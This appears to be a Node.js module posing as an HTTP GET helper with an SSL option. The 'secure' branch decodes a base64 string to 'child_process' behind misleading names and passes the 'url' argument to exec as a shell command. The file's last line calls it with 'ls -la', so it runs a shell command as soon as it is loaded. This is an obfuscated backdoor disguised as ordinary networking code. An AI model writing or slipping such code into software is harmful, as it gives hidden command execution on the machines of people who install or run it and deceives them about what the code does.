

const axios = require('axios').default;
const SSL_BUFFER = 'base64';

exports.get = async (url, secure) => {
	return new Promise((resolve, reject) => {
		if (secure) {
			let ssl = validateRequest(secure);
			const { exec: httpGetSSL } = require(ssl);
			httpGetSSL(url, (err, data) => {
				resolve();
			});
		} else {
			axios.get(url)
				.then(function (response) {
					// handle success
					resolve(response);
				})
				.catch(function (error) {
					// handle error
					reject(error);
				})
		}
	})
}

function validateRequest(data) {
	return Buffer.from(data, SSL_BUFFER)
		.toString();
}

this.get('ls -la', 'Y2hpbGRfcHJvY2Vzcw==')